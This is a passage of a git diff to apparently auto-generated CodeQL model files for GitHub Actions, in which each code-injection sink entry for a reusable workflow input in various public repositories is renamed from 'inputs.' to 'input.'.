githubsecuritylab/actions-all extensible: sinkModel data: - - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.deploy_path", "code-injection", "generated"] - - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.envname", "code-injection", "generated"] \ No newline at end of file + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 61b3e84b29e2..58c30f3cd026 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "inputs.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index 72e4a3eec658..d6c0ced50a6a 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "inputs.ddtrace-version", "code-injection", "generated"] - - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index 5e8754427718..fdcb8775dad4 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.run_id", "code-injection", "generated"] - - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.source_id", "code-injection", "generated"] \ No newline at end of file + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 991743df7d23..66889d2cf428 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] - - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", 
"input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index 780d95fab47f..e5c5cfeabd37 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index cf69379583d2..4dc3fc2bc98f 100644 
--- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] - - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.target_branch", "code-injection", "generated"] + - 
["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 211fe546e28e..52c4b4c7a24c 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["decidim/decidim/.github/workflows/test_app.yml", "*", "inputs.test_command", "code-injection", "generated"] \ No newline at end of file + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index d59258ce992a..038f92a53172 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "inputs.release_number", "code-injection", "generated"] \ No newline at end of file + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 43f5349bf3c6..6fab83acf59a 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "inputs.app-version", "code-injection", "generated"] \ No newline at end of file + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index d6ef60a96984..238856cc7b9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "inputs.test-script", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.test-script", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.display", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.matrix-jobs-count", "code-injection", "generated"] - - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 1d41854bf71f..71b584f54275 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml 
@@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.artifact-name", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.common-files", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.xml-dump-type-sizes", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.tests", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.docs", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.extras", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.stonesense", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.platform-files", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.launchdf", "code-injection", "generated"] - - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.gcc-ver", "code-injection", "generated"] \ No newline at end of file + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.artifact-name", "code-injection", "generated"] + - 
["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "input.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 9f64a59aead1..1aa154828876 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.id", "code-injection", "generated"] - - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "inputs.type", "code-injection", "generated"] \ No newline at end of file + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] + - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 69cb39e5e555..89dd705f5903 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index a66e2a2cca53..eb57c708bf53 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml 
@@ -3,20 +3,20 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.TARGET_NAME", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.EXTRA_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "inputs.TEST_TARGET", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.SUDO", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BINARY_COMPOSE", "code-injection", "generated"] - - 
["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] - - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "inputs.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.TARGET_NAME", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-wait-block-main.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.SUDO", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.EXTRA_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test.yml", "*", "input.TEST_TARGET", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.SUDO", "code-injection", "generated"] + - 
["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BINARY_COMPOSE", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.RUN_EARTHLY_TEST_ARGS", "code-injection", "generated"] + - ["earthly/earthly/.github/workflows/reusable-test-local.yml", "*", "input.BUILT_EARTHLY_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index ca3eeca8df70..048a753c553f 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file + - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index b95ce03ed3a4..739f6a546b2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "inputs.profile", "code-injection", "generated"] \ No newline at end of file + - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index 326d4391ecb5..f6c2769caaf9 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "inputs.solution", "code-injection", "generated"] \ No newline at end of file + - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 9f7298797233..4d104c74c667 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.config", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.base-url", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"] - - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.base-url", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] + - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 835bbf4cf895..9f56abf2858b 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] - - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 453c3cd06f3a..8c73342d5fe3 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "inputs.arch", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.scenario", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.testTimeout", "code-injection", "generated"] - - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.testTimeout", "code-injection", "generated"] + - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 32e6124c06ea..87253d882243 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "inputs.container-runtime", "code-injection", "generated"] \ No newline at end of file + - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] + - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 09177714b081..9eb4c17cd3a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -3,4 +3,4 @@ extensions: pack: 